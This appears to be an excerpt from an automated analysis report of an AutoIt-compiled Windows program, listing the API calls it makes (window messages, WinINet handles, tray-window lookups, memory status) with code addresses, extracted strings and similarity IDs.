                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove$_sprintf_strlen
                                                                          • String ID: %02X
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: htonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: InternetOpen
                                                                          • String ID: <local>
                                                                          • API String ID: 2038078732-4266983199
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: u,D
                                                                          • API String ID: 4104443479-3858472334
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend_mallocwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 1262938277-328681919
                                                                          APIs
                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                          • String ID: aeB
                                                                          • API String ID: 857135153-906807131
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283